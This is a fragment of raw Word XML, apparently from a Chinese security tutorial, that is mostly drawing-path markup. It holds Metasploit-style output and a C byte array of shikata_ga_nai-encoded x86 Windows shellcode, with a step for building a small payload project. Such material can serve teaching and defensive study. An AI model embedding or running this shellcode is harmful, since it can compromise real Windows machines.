11,4466,4510,4466,4510,4466,4510,4466,4510,4466,4510,4466,4509,4466,4509,4466,4509,4466,4509,4466,4508,4466,4508,4466,4508,4466,4507,4466,4507,4466,4506,4466,4506,4466,4505,4466,4505,4466,4504,4466,4504,4466,4503,4466,4502,4466,4502,4466,4501,4466,4500,4466,4499,4466,4498,4466,4497,4466,4497,4466,4496,4466,4495,4466,4493,4466,4492,4466,4491,4466,4490,4466,4489,4466,4487,4466,4486,4466,4485,4466,4483,4466,4482,4466,4480,4466,4479,4466,4477,4466,4475,4466,4473,4466,4472,4466,4470,4466,4468,4466,4466,4466,4464,4466,4462,4466,4459,4466,4457,4466,4455,4466,4452,4466,4450,4466,4447,4466,4445,4466,4442,4466,4439,4466,4437,4466,4434,4466,4431,4466,4428,4466,4425,4466,4422,4466,4418,4466,4415,4466,4412,4466,4408,4466,4405,4466,4401,4466,4397,4466,4393,4466,4389,4466,4386,4466,4381,4466,4377,4466,4373,4466,4369,4466,4364,4466,4360,4466,4355,4466,4351,4466,4346,4466,4341,4466,4336,4466,4331,4466,4326,4466,4321,4466,4315,4466,4310,4466,4304,4466,4299,4466,4293,4466,4287,4466,4281,4466,4275,4466,4269,4466,4263,4466,4256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54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platform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was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selected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choosing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Msf::Module::Platform::Windows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from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payload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arch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selected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selecting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arch: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x86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from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payload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Found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11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compatible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encoders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Attempting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encode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payload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with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1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iterations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x86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shikata_ga_nai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x86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shikata_ga_nai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succeeded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with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size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368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iteration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x86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shikata_ga_nai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chosen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with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final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size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368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Payload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size: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368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bytes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Final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size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file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549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1571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bytes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unsigned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char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buf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"\xd9\xc3\xba\xa1\x43\xe5\x72\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"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"\x56\x31\x55\x18\x03\x55\x18\x83\xc5\xa5\xa1\x10\x8e\x4d\xa7"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"\xdb\x6f\x8d\xc8\x52\x8a\xbc\xc8\x01\xde\xee\xf8\x42\xb2\x02"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"\x72\x06\x27\x91\xf6\x8f\x48\x12\xbc\xe9\x67\xa3\xed\xca\xe6"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"\x27\xec\x1e\xc9\x16\x3f\x53\x08\x5f\x22\x9e\x58\x08\x28\x0d"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"\x4d\x3d\x64\x8e\xe6\x0d\x68\x96\x1b\xc5\x8b\xb7\x8d\x5e\xd2"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"\x17\x2f\xb3\x6e\x1e\x37\xd0\x4b\xe8\xcc\x22\x27\xeb\x04\x7b"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"\xc8\x40\x69\xb4\x3b\x98\xad\x72\xa4\xef\xc7\x81\x59\xe8\x13"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"\xf8\x85\x7d\x80\x5a\x4d\x25\x6c\x5b\x82\xb0\xe7\x57\x6f\xb6"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"\xa0\x7b\x6e\x1b\xdb\x87\xfb\x9a\x0c\x0e\xbf\xb8\x88\x4b\x1b"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"\xa0\x89\x31\xca\xdd\xca\x9a\xb3\x7b\x80\x36\xa7\xf1\xcb\x5e"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"\x04\x38\xf4\x9e\x02\x4b\x87\xac\x8d\xe7\x0f\x9c\x46\x2e\xd7"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"\x95\x41\xd1\x07\x1d\x01\x2f\xa8\x5d\x0b\xf4\xfc\x0d\x23\xdd"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"\x7c\xc6\xb3\xe2\xa8\x72\xbe\x74\x93\x2a\xbf\x81\x7b\x28\xc0"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"\x89\x4e\xa5\x26\xd9\xe0\xe5\xf6\x9a\x50\x45\xa7\x72\xbb\x4a"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"\x98\x63\xc4\x81\xb1\x0e\x2b\x7f\xe9\xa6\xd2\xda\x61\x56\x1a"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"\xf1\x0f\x58\x90\xf3\xf0\x17\x51\x76\xe3\x40\x06\x78\xfb\x90"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"\xa3\x78\x91\x94\x65\x2f\x0d\x97\x50\x07\x92\x68\xb7\x14\xd5"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"\x97\x46\x2c\xad\xae\xdc\x10\xd9\xce\x30\x90\x19\x99\x5a\x90"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30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"\x71\x7d\x3f\xc3\x64\x82\xea\x70\x35\x17\x15\x20\xe9\xb0\x7d"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"\xce\xd4\xf7\x21\x31\x33\x84\x26\xcd\xc1\xa3\x8e\xa5\x39\xf4"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32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"\x2e\x35\x50\xf4\x7e\x5d\xaf\xdb\x71\xad\x50\xf6\xd9\xa5\xdb"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33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"\x97\xa8\x54\xdb\xbd\x6d\xc8\xdc\x32\xb6\xfb\xa7\x3b\x49\xfc"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  <w:spacing w:val="114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"\x57\x52\x2e\xfd\x57\x5a\x50\xc2\x81\x63\x26\x05\x12\xd0\x39"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"\x30\x37\x71\xd0\x3a\x6b\x81\xf1"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49.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId14" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:459.600pt;width:427.800pt;height:182.4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建立Micr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opoor_small_payload工程，配置如下：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412.500pt;width:0.500pt;height:257.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,8250" coordsize="10,5150">
        <v:shape style="position:absolute;left:10390;top:8250;width:10;height:5150" coordorigin="10390,8250" coordsize="10,5150" path="m10402,8263l10402,8263,10402,8263,10402,8263,10402,8263,10402,8263,10402,8264,10402,8264,10402,8264,10402,8265,10402,8265,10402,8266,10402,8267,10402,8268,10402,8270,10402,8272,10402,8273,10402,8276,10402,8278,10402,8281,10402,8284,10402,8288,10402,8291,10402,8296,10402,8300,10402,8305,10402,8311,10402,8317,10402,8323,10402,8330,10402,8338,10402,8346,10402,8354,10402,8363,10402,8373,10402,8383,10402,8394,10402,8406,10402,8418,10402,8431,10402,8444,10402,8459,10402,8474,10402,8489,10402,8506,10402,8523,10402,8542,10402,8560,10402,8580,10402,8601,10402,8623,10402,8645,10402,8668,10402,8693,10402,8718,10402,8744,10402,8771,10402,8800,10402,8829,10402,8859,10402,8891,10402,8923,10402,8957,10402,8991,10402,9027,10402,9064,10402,9102,10402,9141,10402,9182,10402,9224,10402,9267,10402,9311,10402,9356,10402,9403,10402,9451,10402,9501,10402,9552,10402,9604,10402,9658,10402,9713,10402,9769,10402,9827,10402,9887,10402,9947,10402,10010,10402,10074,10402,10139,10402,10206,10402,10275,10402,10345,10402,10417,10402,10490,10402,10565,10402,10642,10402,10720,10402,10800,10402,10882,10402,10966,10402,11051,10402,11138,10402,11227,10402,11318,10402,11410,10402,11505,10402,11601,10402,11699,10402,11799,10402,11901,10402,12005,10402,12111,10402,12219,10402,12329,10402,12441,10402,12555,10402,12671,10402,12789,10402,12909,10402,13031,10402,13156,10402,13282,10402,13411e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:412.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,8250" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:8250;width:8990;height:390" coordorigin="1490,8250" coordsize="8990,390" path="m1510,8263l1510,8263,1510,8263,1510,8263,1510,8263,1510,8263,1510,8263,1511,8263,1512,8263,1512,8263,1514,8263,1515,8263,1517,8263,1519,8263,1521,8263,1524,8263,1528,8263,1532,8263,1536,8263,1541,8263,1546,8263,1552,8263,1559,8263,1566,8263,1575,8263,1583,8263,1593,8263,1603,8263,1615,8263,1627,8263,1640,8263,1654,8263,1668,8263,1684,8263,1701,8263,1719,8263,1738,8263,1758,8263,1780,8263,1802,8263,1826,8263,1851,8263,1877,8263,1904,8263,1933,8263,1963,8263,1995,8263,2028,8263,2063,8263,2099,8263,2136,8263,2175,8263,2216,8263,2259,8263,2303,8263,2348,8263,2396,8263,2445,8263,2496,8263,2549,8263,2604,8263,2660,8263,2719,8263,2779,8263,2841,8263,2906,8263,2972,8263,3041,8263,3112,8263,3184,8263,3259,8263,3336,8263,3416,8263,3498,8263,3582,8263,3668,8263,3757,8263,3848,8263,3941,8263,4037,8263,4136,8263,4236,8263,4340,8263,4446,8263,4555,8263,4666,8263,4780,8263,4897,8263,5017,8263,5139,8263,5264,8263,5392,8263,5523,8263,5657,8263,5793,8263,5933,8263,6076,8263,6222,8263,6370,8263,6522,8263,6677,8263,6835,8263,6997,8263,7161,8263,7329,8263,7500,8263,7675,8263,7853,8263,8034,8263,8219,8263,8407,8263,8598,8263,8793,8263,8992,8263,9194,8263,9400,8263,9609,8263,9823,8263,10039,8263,10260,8263,10484,8263,10484,8263,10484,8263,10484,8263,10484,8263,10484,8263,10484,8263,10484,8263,10484,8263,10484,8263,10484,8263,10484,8263,10484,8263,10484,8264,10484,8264,10484,8264,10484,8264,10484,8264,10484,8264,10484,8265,10484,8265,10484,8265,10484,8265,10484,8266,10484,8266,10484,8266,10484,8267,10484,8267,10484,8268,10484,8268,10484,8269,10484,8269,10484,8270,10484,8271,10484,8271,10484,8272,10484,8273,10484,8274,10484,8275,10484,8276,10484,8277,10484,8278,10484,8279,10484,8280,10484,8282,10484,8283,10484,8284,10484,8286,10484,8287,10484,8289,10484,8290,10484,8292,10484,8294,10484,8296,10484,8298,10484,8300,10484,8302,10484,8304,10484,8306,10484,8308,10484,8311,10484,8313,10484,8316,10484,8318,10484,8321,10484,8324,10484,8327,10484,8330,10484,8333,10484,8336,10484,8339,10484,8343,10484,8346,10484,8350,10484,8353,10484,8357,10484,8361,10484,8365,10484,8369,10484,8373,10484,8377,10484,8382,10484,8386,10484,8391,10484,8396,10484,8400,10484,8405,10484,8410,10484,8416,10484,8421,10484,8426,10484,8432,10484,8438,10484,8443,10484,8449,10484,8455,10484,8462,10484,8468,10484,8474,10484,8481,10484,8488,10484,8495,10484,8502,10484,8509,10484,8516,10484,8524,10484,8531,10484,8539,10484,8547,10484,8555,10484,8563,10484,8571,10484,8580,10484,8588,10484,8597,10484,8606,10484,8615,10484,8625,10484,8634,10484,8644,10484,8653,10484,8653,10484,8653,10484,8653,10484,8653,10484,8653,10484,8653,10483,8653,10482,8653,10482,8653,10480,8653,10479,8653,10477,8653,10475,8653,10473,8653,10470,8653,10466,8653,10462,8653,10458,8653,10453,8653,10448,8653,10442,8653,10435,8653,10428,8653,10419,8653,10411,8653,10401,8653,10391,8653,10379,8653,10367,8653,10354,8653,10340,8653,10326,8653,10310,8653,10293,8653,10275,8653,10256,8653,10236,8653,10215,8653,10192,8653,10168,8653,10143,8653,10117,8653,10090,8653,10061,8653,10031,8653,9999,8653,9966,8653,9931,8653,9895,8653,9858,8653,9819,8653,9778,8653,9735,8653,9691,8653,9646,8653,9598,8653,9549,8653,9498,8653,9445,8653,9391,8653,9334,8653,9275,8653,9215,8653,9153,8653,9088,8653,9022,8653,8953,8653,8883,8653,8810,8653,8735,8653,8658,8653,8578,8653,8497,8653,8413,8653,8326,8653,8238,8653,8146,8653,8053,8653,7957,8653,7859,8653,7758,8653,7654,8653,7548,8653,7439,8653,7328,8653,7214,8653,7097,8653,6977,8653,6855,8653,6730,8653,6602,8653,6471,8653,6337,8653,6201,8653,6061,8653,5918,8653,5773,8653,5624,8653,5472,8653,5317,8653,5159,8653,4997,8653,4833,8653,4665,8653,4494,8653,4319,8653,4141,8653,3960,8653,3776,8653,3587,8653,3396,8653,3201,8653,3002,8653,2800,8653,2594,8653,2385,8653,2172,8653,1955,8653,1734,8653,1510,8653,1510,8653,1510,8653,1510,8653,1510,8653,1510,8653,1510,8653,1510,8653,1510,8653,1510,8653,1510,8653,1510,8653,1510,8653,1510,8653,1510,8653,1510,8653,1510,8653,1510,8652,1510,8652,1510,8652,1510,8652,1510,8652,1510,8651,1510,8651,1510,8651,1510,8650,1510,8650,1510,8649,1510,8649,1510,8648,1510,8648,1510,8647,1510,8646,1510,8646,1510,8645,1510,8644,1510,8643,1510,8643,1510,8642,1510,8641,1510,8640,1510,8639,1510,8637,1510,8636,1510,8635,1510,8634,1510,8632,1510,8631,1510,8629,1510,8628,1510,8626,1510,8624,1510,8623,1510,8621,1510,8619,1510,8617,1510,8615,1510,8613,1510,8610,1510,8608,1510,8606,1510,8603,1510,8601,1510,8598,1510,8595,1510,8593,1510,8590,1510,8587,1510,8584,1510,8581,1510,8577,1510,8574,1510,8570,1510,8567,1510,8563,1510,8560,1510,8556,1510,8552,1510,8548,1510,8543,1510,8539,1510,8535,1510,8530,1510,8526,1510,8521,1510,8516,1510,8511,1510,8506,1510,8501,1510,8496,1510,8490,1510,8485,1510,8479,1510,8473,1510,8467,1510,8461,1510,8455,1510,8448,1510,8442,1510,8435,1510,8429,1510,8422,1510,8415,1510,8408,1510,8400,1510,8393,1510,8385,1510,8378,1510,8370,1510,8362,1510,8353,1510,8345,1510,8337,1510,8328,1510,8319,1510,8310,1510,8301,1510,8292,1510,8283,1510,8273,1510,8263e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:411.600pt;width:445.800pt;height:21.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId16" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:431.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,8630" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:8630;width:8990;height:370" coordorigin="1490,8630" coordsize="8990,370" path="m1510,8653l1510,8653,1510,8653,1510,8653,1510,8653,1510,8653,1510,8653,1511,8653,1512,8653,1512,8653,1514,8653,1515,8653,1517,8653,1519,8653,1521,8653,1524,8653,1528,8653,1532,8653,1536,8653,1541,8653,1546,8653,1552,8653,1559,8653,1566,8653,1575,8653,1583,8653,1593,8653,1603,8653,1615,8653,1627,8653,1640,8653,1654,8653,1668,8653,1684,8653,1701,8653,1719,8653,1738,8653,1758,8653,1780,8653,1802,8653,1826,8653,1851,8653,1877,8653,1904,8653,1933,8653,1963,8653,1995,8653,2028,8653,2063,8653,2099,8653,2136,8653,2175,8653,2216,8653,2259,8653,2303,8653,2348,8653,2396,8653,2445,8653,2496,8653,2549,8653,2604,8653,2660,8653,2719,8653,2779,8653,2841,8653,2906,8653,2972,8653,3041,8653,3112,8653,3184,8653,3259,8653,3336,8653,3416,8653,3498,8653,3582,8653,3668,8653,3757,8653,3848,8653,3941,8653,4037,8653,4136,8653,4236,8653,4340,8653,4446,8653,4555,8653,4666,8653,4780,8653,4897,8653,5017,8653,5139,8653,5264,8653,5392,8653,5523,8653,5657,8653,5793,8653,5933,8653,6076,8653,6222,8653,6370,8653,6522,8653,6677,8653,6835,8653,6997,8653,7161,8653,7329,8653,7500,8653,7675,8653,7853,8653,8034,8653,8219,8653,8407,8653,8598,8653,8793,8653,8992,8653,9194,8653,9400,8653,9609,8653,9823,8653,10039,8653,10260,8653,10484,8653,10484,8653,10484,8653,10484,8653,10484,8653,10484,8653,10484,8653,10484,8653,10484,8653,10484,8653,10484,8654,10484,8654,10484,8654,10484,8654,10484,8654,10484,8654,10484,8654,10484,8654,10484,8654,10484,8655,10484,8655,10484,8655,10484,8655,10484,8656,10484,8656,10484,8656,10484,8657,10484,8657,10484,8658,10484,8658,10484,8659,10484,8659,10484,8660,10484,8660,10484,8661,10484,8662,10484,8663,10484,8663,10484,8664,10484,8665,10484,8666,10484,8667,10484,8668,10484,8669,10484,8670,10484,8672,10484,8673,10484,8674,10484,8676,10484,8677,10484,8679,10484,8680,10484,8682,10484,8683,10484,8685,10484,8687,10484,8689,10484,8691,10484,8693,10484,8695,10484,8697,10484,8700,10484,8702,10484,8704,10484,8707,10484,8709,10484,8712,10484,8715,10484,8718,10484,8721,10484,8724,10484,8727,10484,8730,10484,8733,10484,8737,10484,8740,10484,8744,10484,8747,10484,8751,10484,8755,10484,8759,10484,8763,10484,8767,10484,8771,10484,8776,10484,8780,10484,8785,10484,8789,10484,8794,10484,8799,10484,8804,10484,8809,10484,8814,10484,8820,10484,8825,10484,8831,10484,8837,10484,8842,10484,8848,10484,8855,10484,8861,10484,8867,10484,8874,10484,8880,10484,8887,10484,8894,10484,8901,10484,8908,10484,8915,10484,8923,10484,8930,10484,8938,10484,8946,10484,8954,10484,8962,10484,8970,10484,8978,10484,8987,10484,8996,10484,9005,10484,9014,10484,9014,10484,9014,10484,9014,10484,9014,10484,9014,10484,9014,10483,9014,10482,9014,10482,9014,10480,9014,10479,9014,10477,9014,10475,9014,10473,9014,10470,9014,10466,9014,10462,9014,10458,9014,10453,9014,10448,9014,10442,9014,10435,9014,10428,9014,10419,9014,10411,9014,10401,9014,10391,9014,10379,9014,10367,9014,10354,9014,10340,9014,10326,9014,10310,9014,10293,9014,10275,9014,10256,9014,10236,9014,10215,9014,10192,9014,10168,9014,10143,9014,10117,9014,10090,9014,10061,9014,10031,9014,9999,9014,9966,9014,9931,9014,9895,9014,9858,9014,9819,9014,9778,9014,9735,9014,9691,9014,9646,9014,9598,9014,9549,9014,9498,9014,9445,9014,9391,9014,9334,9014,9275,9014,9215,9014,9153,9014,9088,9014,9022,9014,8953,9014,8883,9014,8810,9014,8735,9014,8658,9014,8578,9014,8497,9014,8413,9014,8326,9014,8238,9014,8146,9014,8053,9014,7957,9014,7859,9014,7758,9014,7654,9014,7548,9014,7439,9014,7328,9014,7214,9014,7097,9014,6977,9014,6855,9014,6730,9014,6602,9014,6471,9014,6337,9014,6201,9014,6061,9014,5918,9014,5773,9014,5624,9014,5472,9014,5317,9014,5159,9014,4997,9014,4833,9014,4665,9014,4494,9014,4319,9014,4141,9014,3960,9014,3776,9014,3587,9014,3396,9014,3201,9014,3002,9014,2800,9014,2594,9014,2385,9014,2172,9014,1955,9014,1734,9014,1510,9014,1510,9014,1510,9014,1510,9014,1510,9014,1510,9014,1510,9014,1510,9013,1510,9013,1510,9013,1510,9013,1510,9013,1510,9013,1510,9013,1510,9013,1510,9013,1510,9013,1510,9013,1510,9012,1510,9012,1510,9012,1510,9012,1510,9012,1510,9011,1510,9011,1510,9011,1510,9010,1510,9010,1510,9009,1510,9009,1510,9008,1510,9008,1510,9007,1510,9007,1510,9006,1510,9005,1510,9004,1510,9004,1510,9003,1510,9002,1510,9001,1510,9000,1510,8999,1510,8998,1510,8997,1510,8995,1510,8994,1510,8993,1510,8991,1510,8990,1510,8988,1510,8987,1510,8985,1510,8983,1510,8982,1510,8980,1510,8978,1510,8976,1510,8974,1510,8972,1510,8970,1510,8967,1510,8965,1510,8963,1510,8960,1510,8958,1510,8955,1510,8952,1510,8949,1510,8946,1510,8943,1510,8940,1510,8937,1510,8934,1510,8930,1510,8927,1510,8923,1510,8920,1510,8916,1510,8912,1510,8908,1510,8904,1510,8900,1510,8896,1510,8891,1510,8887,1510,8882,1510,8878,1510,8873,1510,8868,1510,8863,1510,8858,1510,8852,1510,8847,1510,8842,1510,8836,1510,8830,1510,8824,1510,8818,1510,8812,1510,8806,1510,8800,1510,8793,1510,8787,1510,8780,1510,8773,1510,8766,1510,8759,1510,8752,1510,8744,1510,8737,1510,8729,1510,8721,1510,8713,1510,8705,1510,8697,1510,8688,1510,8680,1510,8671,1510,8662,1510,8653e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:432.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,8650" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:8650;width:30;height:370" coordorigin="1490,8650" coordsize="30,370" path="m1517,8653l1517,8653,1517,8653,1517,8653,1517,8653,1517,8653,1517,8653,1517,8653,1517,8653,1517,8653,1517,8654,1517,8654,1517,8654,1517,8654,1517,8654,1517,8654,1517,8654,1517,8654,1517,8654,1517,8655,1517,8655,1517,8655,1517,8655,1517,8656,1517,8656,1517,8656,1517,8657,1517,8657,1517,8658,1517,8658,1517,8659,1517,8659,1517,8660,1517,8660,1517,8661,1517,8662,1517,8663,1517,8663,1517,8664,1517,8665,1517,8666,1517,8667,1517,8668,1517,8669,1517,8670,1517,8672,1517,8673,1517,8674,1517,8676,1517,8677,1517,8679,1517,8680,1517,8682,1517,8683,1517,8685,1517,8687,1517,8689,1517,8691,1517,8693,1517,8695,1517,8697,1517,8700,1517,8702,1517,8704,1517,8707,1517,8709,1517,8712,1517,8715,1517,8718,1517,8721,1517,8724,1517,8727,1517,8730,1517,8733,1517,8737,1517,8740,1517,8744,1517,8747,1517,8751,1517,8755,1517,8759,1517,8763,1517,8767,1517,8771,1517,8776,1517,8780,1517,8785,1517,8789,1517,8794,1517,8799,1517,8804,1517,8809,1517,8814,1517,8820,1517,8825,1517,8831,1517,8837,1517,8842,1517,8848,1517,8855,1517,8861,1517,8867,1517,8874,1517,8880,1517,8887,1517,8894,1517,8901,1517,8908,1517,8915,1517,8923,1517,8930,1517,8938,1517,8946,1517,8954,1517,8962,1517,8970,1517,8978,1517,8987,1517,8996,1517,9005,1517,9014e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:449.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,8990" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:8990;width:8990;height:390" coordorigin="1490,8990" coordsize="8990,390" path="m1510,9014l1510,9014,1510,9014,1510,9014,1510,9014,1510,9014,1510,9014,1511,9014,1512,9014,1512,9014,1514,9014,1515,9014,1517,9014,1519,9014,1521,9014,1524,9014,1528,9014,1532,9014,1536,9014,1541,9014,1546,9014,1552,9014,1559,9014,1566,9014,1575,9014,1583,9014,1593,9014,1603,9014,1615,9014,1627,9014,1640,9014,1654,9014,1668,9014,1684,9014,1701,9014,1719,9014,1738,9014,1758,9014,1780,9014,1802,9014,1826,9014,1851,9014,1877,9014,1904,9014,1933,9014,1963,9014,1995,9014,2028,9014,2063,9014,2099,9014,2136,9014,2175,9014,2216,9014,2259,9014,2303,9014,2348,9014,2396,9014,2445,9014,2496,9014,2549,9014,2604,9014,2660,9014,2719,9014,2779,9014,2841,9014,2906,9014,2972,9014,3041,9014,3112,9014,3184,9014,3259,9014,3336,9014,3416,9014,3498,9014,3582,9014,3668,9014,3757,9014,3848,9014,3941,9014,4037,9014,4136,9014,4236,9014,4340,9014,4446,9014,4555,9014,4666,9014,4780,9014,4897,9014,5017,9014,5139,9014,5264,9014,5392,9014,5523,9014,5657,9014,5793,9014,5933,9014,6076,9014,6222,9014,6370,9014,6522,9014,6677,9014,6835,9014,6997,9014,7161,9014,7329,9014,7500,9014,7675,9014,7853,9014,8034,9014,8219,9014,8407,9014,8598,9014,8793,9014,8992,9014,9194,9014,9400,9014,9609,9014,9823,9014,10039,9014,10260,9014,10484,9014,10484,9014,10484,9014,10484,9014,10484,9014,10484,9014,10484,9014,10484,9014,10484,9014,10484,9014,10484,9014,10484,9014,10484,9014,10484,9014,10484,9014,10484,9014,10484,9014,10484,9014,10484,9015,10484,9015,10484,9015,10484,9015,10484,9016,10484,9016,10484,9016,10484,9017,10484,9017,10484,9017,10484,9018,10484,9018,10484,9019,10484,9020,10484,9020,10484,9021,10484,9022,10484,9022,10484,9023,10484,9024,10484,9025,10484,9026,10484,9027,10484,9028,10484,9029,10484,9030,10484,9031,10484,9033,10484,9034,10484,9035,10484,9037,10484,9038,10484,9040,10484,9041,10484,9043,10484,9045,10484,9047,10484,9049,10484,9051,10484,9053,10484,9055,10484,9057,10484,9059,10484,9062,10484,9064,10484,9067,10484,9069,10484,9072,10484,9075,10484,9078,10484,9081,10484,9084,10484,9087,10484,9090,10484,9093,10484,9097,10484,9100,10484,9104,10484,9107,10484,9111,10484,9115,10484,9119,10484,9123,10484,9128,10484,9132,10484,9136,10484,9141,10484,9145,10484,9150,10484,9155,10484,9160,10484,9165,10484,9170,10484,9176,10484,9181,10484,9187,10484,9193,10484,9198,10484,9204,10484,9211,10484,9217,10484,9223,10484,9230,10484,9236,10484,9243,10484,9250,10484,9257,10484,9264,10484,9271,10484,9279,10484,9286,10484,9294,10484,9302,10484,9310,10484,9318,10484,9326,10484,9335,10484,9343,10484,9352,10484,9361,10484,9370,10484,9379,10484,9389,10484,9389,10484,9389,10484,9389,10484,9389,10484,9389,10484,9389,10483,9389,10482,9389,10482,9389,10480,9389,10479,9389,10477,9389,10475,9389,10473,9389,10470,9389,10466,9389,10462,9389,10458,9389,10453,9389,10448,9389,10442,9389,10435,9389,10428,9389,10419,9389,10411,9389,10401,9389,10391,9389,10379,9389,10367,9389,10354,9389,10340,9389,10326,9389,10310,9389,10293,9389,10275,9389,10256,9389,10236,9389,10215,9389,10192,9389,10168,9389,10143,9389,10117,9389,10090,9389,10061,9389,10031,9389,9999,9389,9966,9389,9931,9389,9895,9389,9858,9389,9819,9389,9778,9389,9735,9389,9691,9389,9646,9389,9598,9389,9549,9389,9498,9389,9445,9389,9391,9389,9334,9389,9275,9389,9215,9389,9153,9389,9088,9389,9022,9389,8953,9389,8883,9389,8810,9389,8735,9389,8658,9389,8578,9389,8497,9389,8413,9389,8326,9389,8238,9389,8146,9389,8053,9389,7957,9389,7859,9389,7758,9389,7654,9389,7548,9389,7439,9389,7328,9389,7214,9389,7097,9389,6977,9389,6855,9389,6730,9389,6602,9389,6471,9389,6337,9389,6201,9389,6061,9389,5918,9389,5773,9389,5624,9389,5472,9389,5317,9389,5159,9389,4997,9389,4833,9389,4665,9389,4494,9389,4319,9389,4141,9389,3960,9389,3776,9389,3587,9389,3396,9389,3201,9389,3002,9389,2800,9389,2594,9389,2385,9389,2172,9389,1955,9389,1734,9389,1510,9389,1510,9389,1510,9389,1510,9389,1510,9389,1510,9389,1510,9389,1510,9389,1510,9389,1510,9389,1510,9389,1510,9389,1510,9388,1510,9388,1510,9388,1510,9388,1510,9388,1510,9388,1510,9388,1510,9387,1510,9387,1510,9387,1510,9387,1510,9386,1510,9386,1510,9386,1510,9385,1510,9385,1510,9384,1510,9384,1510,9383,1510,9383,1510,9382,1510,9381,1510,9381,1510,9380,1510,9379,1510,9378,1510,9377,1510,9377,1510,9376,1510,9374,1510,9373,1510,9372,1510,9371,1510,9370,1510,9368,1510,9367,1510,9366,1510,9364,1510,9363,1510,9361,1510,9359,1510,9357,1510,9356,1510,9354,1510,9352,1510,9350,1510,9347,1510,9345,1510,9343,1510,9341,1510,9338,1510,9336,1510,9333,1510,9330,1510,9328,1510,9325,1510,9322,1510,9319,1510,9316,1510,9312,1510,9309,1510,9306,1510,9302,1510,9299,1510,9295,1510,9291,1510,9287,1510,9283,1510,9279,1510,9275,1510,9270,1510,9266,1510,9261,1510,9257,1510,9252,1510,9247,1510,9242,1510,9237,1510,9232,1510,9226,1510,9221,1510,9215,1510,9210,1510,9204,1510,9198,1510,9192,1510,9186,1510,9179,1510,9173,1510,9166,1510,9159,1510,9152,1510,9145,1510,9138,1510,9131,1510,9124,1510,9116,1510,9108,1510,9100,1510,9092,1510,9084,1510,9076,1510,9067,1510,9059,1510,9050,1510,9041,1510,9032,1510,9023,1510,9014e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:450.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,9010" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:9010;width:30;height:370" coordorigin="1490,9010" coordsize="30,370" path="m1517,9014l1517,9014,1517,9014,1517,9014,1517,9014,1517,9014,1517,9014,1517,9014,1517,9014,1517,9014,1517,9014,1517,9014,1517,9014,1517,9014,1517,9014,1517,9014,1517,9014,1517,9014,1517,9015,1517,9015,1517,9015,1517,9015,1517,9016,1517,9016,1517,9016,1517,9017,1517,9017,1517,9017,1517,9018,1517,9018,1517,9019,1517,9020,1517,9020,1517,9021,1517,9022,1517,9022,1517,9023,1517,9024,1517,9025,1517,9026,1517,9027,1517,9028,1517,9029,1517,9030,1517,9031,1517,9033,1517,9034,1517,9035,1517,9037,1517,9038,1517,9040,1517,9041,1517,9043,1517,9045,1517,9047,1517,9049,1517,9051,1517,9053,1517,9055,1517,9057,1517,9059,1517,9062,1517,9064,1517,9067,1517,9069,1517,9072,1517,9075,1517,9078,1517,9081,1517,9084,1517,9087,1517,9090,1517,9093,1517,9097,1517,9100,1517,9104,1517,9107,1517,9111,1517,9115,1517,9119,1517,9123,1517,9128,1517,9132,1517,9136,1517,9141,1517,9145,1517,9150,1517,9155,1517,9160,1517,9165,1517,9170,1517,9176,1517,9181,1517,9187,1517,9193,1517,9198,1517,9204,1517,9211,1517,9217,1517,9223,1517,9230,1517,9236,1517,9243,1517,9250,1517,9257,1517,9264,1517,9271,1517,9279,1517,9286,1517,9294,1517,9302,1517,9310,1517,9318,1517,9326,1517,9335,1517,9343,1517,9352,1517,9361,1517,9370,1517,9379,1517,9389e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
